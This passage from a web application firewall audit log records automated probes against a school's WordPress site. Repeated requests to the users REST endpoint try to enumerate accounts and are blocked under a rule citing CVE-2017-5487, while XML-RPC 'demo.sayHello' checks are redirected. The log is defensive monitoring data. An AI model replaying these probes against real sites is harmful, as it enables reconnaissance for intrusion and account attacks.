1746463775920363 2967; combined=1471, p1=475, p2=963, p3=0, p4=0, p5=33, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11551873-Z-- --77ab1f7c-A-- [05/May/2025:23:49:38 +0700] aBjsIvZJDMuQndL03JNkAAAAAE0 103.236.140.4 40958 103.236.140.4 8181 --77ab1f7c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.166.191 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.166.191 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --77ab1f7c-C-- demo.sayHello --77ab1f7c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --77ab1f7c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746463778958808 5521 (- - -) Stopwatch2: 1746463778958808 5521; combined=4211, p1=566, p2=3420, p3=32, p4=35, p5=94, sr=82, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77ab1f7c-Z-- --b37bb97b-A-- [05/May/2025:23:49:53 +0700] aBjsMfZJDMuQndL03JNkCAAAAEo 103.236.140.4 41062 103.236.140.4 8181 --b37bb97b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.43 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.43 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b37bb97b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b37bb97b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746463793259648 2299 (- - -) Stopwatch2: 1746463793259648 2299; combined=1253, p1=398, p2=826, p3=0, p4=0, p5=29, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b37bb97b-Z-- --5a662107-A-- [05/May/2025:23:49:56 +0700] aBjsNIZWvR7-42f6JrASDwAAAMo 103.236.140.4 41086 103.236.140.4 8181 --5a662107-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.43 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.43 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5a662107-C-- demo.sayHello --5a662107-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5a662107-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746463796104425 5838 (- - -) Stopwatch2: 1746463796104425 5838; combined=4258, p1=525, p2=3500, p3=31, p4=35, p5=98, sr=72, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5a662107-Z-- --e09e4b11-A-- [05/May/2025:23:50:01 +0700] aBjsOU2V_h1VFAgsfgaC9wAAABM 103.236.140.4 41142 103.236.140.4 8181 --e09e4b11-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.104.226 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.104.226 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e09e4b11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e09e4b11-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746463801294151 3096 (- - -) Stopwatch2: 1746463801294151 3096; combined=1463, p1=474, p2=956, p3=0, p4=0, p5=33, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e09e4b11-Z-- --774a212a-A-- [05/May/2025:23:50:04 +0700] aBjsPPZJDMuQndL03JNkDgAAAEg 103.236.140.4 41174 103.236.140.4 8181 --774a212a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.104.226 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.104.226 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --774a212a-C-- demo.sayHello --774a212a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --774a212a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746463804356783 5608 (- - -) Stopwatch2: 1746463804356783 5608; combined=4119, p1=531, p2=3370, p3=32, p4=34, p5=90, sr=72, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --774a212a-Z-- --1a1afd0f-A-- [05/May/2025:23:50:09 +0700] aBjsQU2V_h1VFAgsfgaC_QAAAA8 103.236.140.4 41214 103.236.140.4 8181 --1a1afd0f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.113 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.113 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1a1afd0f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1a1afd0f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746463809521034 2703 (- - -) Stopwatch2: 1746463809521034 2703; combined=1221, p1=424, p2=769, p3=0, p4=0, p5=28, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a1afd0f-Z-- --09fe9f4d-A-- [05/May/2025:23:50:12 +0700] aBjsRPZJDMuQndL03JNkFgAAAEo 103.236.140.4 41234 103.236.140.4 8181 --09fe9f4d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.113 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.113 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --09fe9f4d-C-- demo.sayHello --09fe9f4d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --09fe9f4d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746463812442292 5800 (- - -) Stopwatch2: 1746463812442292 5800; combined=4278, p1=519, p2=3530, p3=31, p4=36, p5=96, sr=73, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --09fe9f4d-Z-- --957cdb34-A-- [05/May/2025:23:50:29 +0700] aBjsVU2V_h1VFAgsfgaDHwAAAA0 103.236.140.4 41378 103.236.140.4 8181 --957cdb34-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.82 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.82 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --957cdb34-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --957cdb34-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746463829845965 3012 (- - -) Stopwatch2: 1746463829845965 3012; combined=1332, p1=425, p2=879, p3=0, p4=0, p5=28, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --957cdb34-Z-- --1dfd9d73-A-- [05/May/2025:23:50:32 +0700] aBjsWARwKNFSM6B7_Lal8gAAAI4 103.236.140.4 41414 103.236.140.4 8181 --1dfd9d73-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.82 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.82 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1dfd9d73-C-- demo.sayHello --1dfd9d73-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1dfd9d73-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746463832642466 5303 (- - -) Stopwatch2: 1746463832642466 5303; combined=4177, p1=510, p2=3388, p3=47, p4=89, p5=87, sr=71, sw=56, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1dfd9d73-Z-- --7cb3e16e-A-- [05/May/2025:23:50:35 +0700] aBjsW02V_h1VFAgsfgaDKAAAAAo 103.236.140.4 41442 103.236.140.4 8181 --7cb3e16e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.72.34 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.72.34 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7cb3e16e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7cb3e16e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746463835483158 2983 (- - -) Stopwatch2: 1746463835483158 2983; combined=1296, p1=436, p2=826, p3=0, p4=0, p5=34, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7cb3e16e-Z-- --63e0a26c-A-- [05/May/2025:23:50:38 +0700] aBjsXk2V_h1VFAgsfgaDLgAAAAU 103.236.140.4 41466 103.236.140.4 8181 --63e0a26c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.72.34 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.72.34 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --63e0a26c-C-- demo.sayHello --63e0a26c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --63e0a26c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746463838799832 5307 (- - -) Stopwatch2: 1746463838799832 5307; combined=4225, p1=534, p2=3470, p3=32, p4=36, p5=91, sr=71, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63e0a26c-Z-- --e856823f-A-- [05/May/2025:23:50:41 +0700] aBjsYYZWvR7-42f6JrASIwAAAME 103.236.140.4 41498 103.236.140.4 8181 --e856823f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.167.27 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.167.27 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e856823f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e856823f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746463841954755 2165 (- - -) Stopwatch2: 1746463841954755 2165; combined=1166, p1=371, p2=766, p3=0, p4=0, p5=29, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e856823f-Z-- --a296ad31-A-- [05/May/2025:23:50:44 +0700] aBjsZPZJDMuQndL03JNkIAAAAEk 103.236.140.4 41534 103.236.140.4 8181 --a296ad31-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.167.27 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.167.27 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a296ad31-C-- demo.sayHello --a296ad31-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a296ad31-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746463844697399 5802 (- - -) Stopwatch2: 1746463844697399 5802; combined=4296, p1=514, p2=3558, p3=32, p4=36, p5=92, sr=74, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a296ad31-Z-- --0f136438-A-- [05/May/2025:23:52:13 +0700] aBjsvU2V_h1VFAgsfgaDowAAABQ 103.236.140.4 42304 103.236.140.4 8181 --0f136438-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.201.10.183 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.10.183 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0f136438-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f136438-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746463933172469 2540 (- - -) Stopwatch2: 1746463933172469 2540; combined=1203, p1=400, p2=773, p3=0, p4=0, p5=29, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f136438-Z-- --3b860367-A-- [05/May/2025:23:52:14 +0700] aBjsvk2V_h1VFAgsfgaDpgAAAAw 103.236.140.4 42314 103.236.140.4 8181 --3b860367-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.179.251 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.179.251 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3b860367-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b860367-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746463934308828 2531 (- - -) Stopwatch2: 1746463934308828 2531; combined=1496, p1=463, p2=996, p3=0, p4=0, p5=37, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b860367-Z-- --f7203575-A-- [05/May/2025:23:52:16 +0700] aBjswPZJDMuQndL03JNkOgAAAFA 103.236.140.4 42338 103.236.140.4 8181 --f7203575-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.201.10.183 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.10.183 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f7203575-C-- demo.sayHello --f7203575-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f7203575-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746463936211020 5637 (- - -) Stopwatch2: 1746463936211020 5637; combined=4210, p1=540, p2=3382, p3=35, p4=35, p5=154, sr=73, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f7203575-Z-- --f043a32a-A-- [05/May/2025:23:52:17 +0700] aBjswU2V_h1VFAgsfgaDrgAAABA 103.236.140.4 42356 103.236.140.4 8181 --f043a32a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.179.251 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.179.251 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f043a32a-C-- demo.sayHello --f043a32a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f043a32a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file 